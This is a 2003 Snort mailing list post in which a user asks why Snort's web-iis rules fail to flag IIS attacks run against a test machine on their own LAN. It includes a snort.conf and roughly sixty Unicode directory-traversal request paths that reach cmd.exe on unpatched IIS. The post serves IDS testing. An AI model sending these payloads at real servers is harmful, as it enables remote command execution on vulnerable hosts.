Snort mailing list archives

Problem with web-iis rules

From: "Yan Zhai" <yzhai () unity ncsu edu>
Date: Fri, 10 Oct 2003 11:39:55 -0400
Hi there,

I installed snort on my machine and launched a number of IIS attacks from my machine to another one in the LAN.  The 
other machine is running an unpatched iis4.0 and the attacks are successful.  Snort successfully reported the nmap 
portscans, however, it failed to report the iis attacks.  It seems to me that snort just doesn't load up the web-iis 
rules.  Below is my snort.conf, which is the default snort.conf with database output option.  Can anyone point out 
what's the problem with it?  Thanks.


var HOME_NET any
var EXTERNAL_NET any
var DNS_SERVERS $HOME_NET
var SMTP_SERVERS $HOME_NET
var HTTP_SERVERS $HOME_NET
var SQL_SERVERS $HOME_NET
var TELNET_SERVERS $HOME_NET
var HTTP_PORTS 80
var SHELLCODE_PORTS !80
var ORACLE_PORTS 1521
var AIM_SERVERS 
[64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.12.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24]
var RULE_PATH ../rules
preprocessor frag2
preprocessor rpc_decode: 111 32771
preprocessor bo

output database: log, mssql, dbname=alerts user=snortuser password=****

include classification.config
include reference.config
include $RULE_PATH/bad-traffic.rules
include $RULE_PATH/exploit.rules
include $RULE_PATH/scan.rules
include $RULE_PATH/finger.rules
include $RULE_PATH/ftp.rules
include $RULE_PATH/telnet.rules
include $RULE_PATH/rpc.rules
include $RULE_PATH/rservices.rules
include $RULE_PATH/dos.rules
include $RULE_PATH/ddos.rules
include $RULE_PATH/dns.rules
include $RULE_PATH/tftp.rules
include $RULE_PATH/web-cgi.rules
include $RULE_PATH/web-coldfusion.rules
include $RULE_PATH/web-iis.rules
include $RULE_PATH/web-frontpage.rules
include $RULE_PATH/web-misc.rules
include $RULE_PATH/web-client.rules
include $RULE_PATH/web-php.rules
include $RULE_PATH/sql.rules
include $RULE_PATH/x11.rules
include $RULE_PATH/icmp.rules
include $RULE_PATH/netbios.rules
include $RULE_PATH/misc.rules
include $RULE_PATH/attack-responses.rules
include $RULE_PATH/oracle.rules
include $RULE_PATH/mysql.rules
include $RULE_PATH/snmp.rules

include $RULE_PATH/smtp.rules
include $RULE_PATH/imap.rules
include $RULE_PATH/pop2.rules
include $RULE_PATH/pop3.rules

include $RULE_PATH/nntp.rules
include $RULE_PATH/other-ids.rules
# include $RULE_PATH/web-attacks.rules
# include $RULE_PATH/backdoor.rules
# include $RULE_PATH/shellcode.rules
# include $RULE_PATH/policy.rules
# include $RULE_PATH/porn.rules
# include $RULE_PATH/info.rules
# include $RULE_PATH/icmp-info.rules
# include $RULE_PATH/virus.rules
# include $RULE_PATH/chat.rules
# include $RULE_PATH/multimedia.rules
# include $RULE_PATH/p2p.rules
include $RULE_PATH/experimental.rules
include $RULE_PATH/local.rules

and here are the iis scripts I used:

/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

-Yan
Current thread:

Problem with web-iis rules Yan Zhai (Oct 10)
- Re: Problem with web-iis rules Matt Kettler (Oct 10)
- Re: Problem with web-iis rules Erek Adams (Oct 10)
- Re: Problem with web-iis rules Josh Berry (Oct 10)
- Re: Problem with web-iis rules Josh Berry (Oct 10)
- <Possible follow-ups>
- RE: Problem with web-iis rules snort-ml (Oct 10)
  - RE: Problem with web-iis rules Yan Zhai (Oct 11)
- Re: Problem with web-iis rules Yan Zhai (Oct 11)
- RE: Problem with web-iis rules Alex Alborzfard (Oct 13)